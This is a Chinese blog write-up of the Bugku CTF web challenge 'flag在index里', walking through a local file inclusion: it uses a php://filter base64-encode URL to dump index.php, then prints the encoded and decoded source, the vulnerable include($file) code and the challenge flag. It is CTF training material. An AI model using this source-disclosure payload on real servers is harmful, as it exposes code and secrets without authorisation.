bugku flag在index里

最新推荐文章于 2019-07-13 13:38:14 发布
最新推荐文章于 2019-07-13 13:38:14 发布
阅读量297 收藏
点赞数
分类专栏: ctf-web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Seaern/article/details/94492863
版权

题目链接

在这里插入图片描述
在这里插入图片描述

  • 第二个界面发现url为:

http://123.206.87.240:8005/post/index.php?file=show.php

	参数有file选项,联想到了文件包含漏洞
  • 结合题目提示:

flag在index里

通过PHP内置协议直接读取代码

PHP内置协议

通过构造如下语句:

http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

就能获得xxx.php的代码的base64加密结果,通过base64解密后便可获得xxx.php的代码

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到base64编码:

PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==

解码后:

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>

得到flag:
flag{edulcni_elif_lacol_si_siht}

偷懒不学习
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含漏洞 基础
weixin_50464560的博客
03-21 887
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
Bugku:flagindex
foreverzwl
10-22 1731
php文件包含漏洞
第十届全国大学生信息安全竞赛-web-writeup
dengzhasong7076的博客
07-11 658
PHP execise http://106.75.126.194:6789 备用 http://106.75.126.228:6789 输入点是能够执行php代码的,看了一下disabled_function assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,...
BugkuCTF–flagindex
热门推荐
超人学飞的日子
06-05 4万+
题目地址http://120.24.86.145:8005/post/这道题目有经典的本地文件包含漏洞+php伪协议的结合应用点击后注意到url地址  http://120.24.86.145:8005/post/index.php?file=show.php这是一个典型的文件包含漏洞,(file关键字是提示,其实也是CTF的套路)。这用到了php的封装协议:http://php.net/ma...
bugku flagindex
rommel的博客
08-01 5111
首先进去界面是一个这样的界面 我们点击后发现网址变成了http://120.24.86.145:8005/post/index.php?file=show.php 这我们看到了file关键字 于是我们就想到了php://filter 如果不懂的话这给大家一篇博客 点击打开链接 所以我们把网址改为 http://120.24.86.145:8005/post/index
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
解析bam文件中flag标签
02-10
解析bam文件中flag标签
wuxinghongqi.rar_flag
09-23
标题中的“wuxinghongqi.rar_flag”可能是指一个与五星红旗相关的编程挑战或竞赛题目,其中“rar_flag”可能暗示着解压文件后会得到一个“flag”,在编程竞赛中通常代表解决任务后的标志或答案。描述提到这是一个用...
AWD自动提交flag脚本
05-14
【AWD自动提交flag脚本】是用于网络安全竞赛(如Capture The Flag,简称CTF)中的自动化工具,特别是在 Automated Web Defense(AWD)类型的比赛中。这类脚本的主要目的是提高效率,减少手动操作,使得参赛者能够...
CTF/CTF练习平台-flagindex【php://filter的利用】
Sp4rkW的博客
08-20 4万+
原题内容: http://120.24.86.145:8005/post/ Mark一下这道题,前前后后弄了两个多小时,翻了一下别的博主的wp感觉还是讲的太粗了,这总结下自己的理解: 首先打开这道题,页面只给你click me? no 点击进去显示test5 第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://12...
CTF之Bugku flagindex
weixin_41607190的博客
10-08 1031
这是一道重新温习的题,直接来看。 “点我?不” 我就点!基本操作还是要看看源代码的,不过这个没什么好看的就不贴图了。 点完后发现URL后面有个 file=balabalabala 的,就联想到php://filter 不明白为什么会这样联想的就看看这个文章。 简单来说就是查看网页同一目录下的另一个文件。 怎么查看呢? 在file=后面加上这样一个语句php://filter/read=conv...
bugku-flagindex(本地文件包含漏洞+php伪协议)
烟敛寒林的博客
11-11 2605
题目地址http://123.206.87.240:8005/post/ click点击进去 从 url地址可以猜测,需要用到 php://filter伪协议。 用法: php://filter/read=convert.base64encode/resource=[文件路径] 含义: php://filter是一种元封装器,设计用于"数据流打开"时的...
BugKuCTF WEB flagindex
无限迭代中......
07-09 552
http://123.206.87.240:8005/post/ 题解:本地文件包含漏洞+php伪协议的结合应用 原理:php的封装协议:http://php.net/manual/zh/wrappers.php.php 点击 URL http://123.206.87.240:8005/post/index.php?file=show.php 文件包含漏洞 URL ...
BugkuCTF:flagindex;输入密码查看flag
s0il的博客
02-16 3090
flagindex 题目是这样:                                          点击之后是这样:                                              url变成了: http://123.206.87.240:8005/post/index.php?file=show.php 看到大佬的解答,因为有fil...
Bugku–flagindex(本地文件包含)writeup
xuchen16的博客
09-19 2480
flagindex 80 http://120.24.86.145:8005/post/   解题思路: 首先打开这道题,页面只给你click me? no 点击进去显示test5     第一步,查看源代码,无果 第二步bp,无果 结合到题目,flagindex,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样...
flagindex,php://filter协议
wssmiss的博客
03-06 733
题目连接http://123.206.87.240:8005/post/ 题目 点击之后出现 地址栏:http://123.206.87.240:8005/post/index.php?file=show.php 观察此题的切入点应该在文件包含漏洞,而且是php ...
BugkuCTF-web-前女友 writeup
会下雪的晴天
07-13 600
题目描述 题目传送门:http://123.206.31.85:49162/ 解题思路 打开链接一大段文字,,,没什么有用的,,嗯,PHP是世界上最好的语言 老套路,先看看源码再说 不看源码还真是看不出来这有个链接,打开这个隐蔽链接后得到: <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isse...
flagindex
舞动的獾
06-13 520
flagindex 题目要求: 文件包含 查看源代码,发现file=show.php,可能就是文件包含 并不知道大佬们如何得到源码的,我只是用他们的博客看看怎么做,关键就在于那个PHP过滤封装协议 由于是刚刚入门的小白,还不是很明白这种操作,继续研究了一下,官方文档链接如下 http://www.php.net/manual/zh/wrappers.php.php 这摘抄一些跟本文有关的重...
flag在python中用法
最新发布
09-06
在 Python 中,`flag` 通常指一个布尔型变量,用于表示某个条件是否满足。在程序中,可以通过不断修改 `flag` 的值来控制程序的流程。 下面是一个简单的示例代码,演示了 `flag` 的使用方法: ```python flag = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值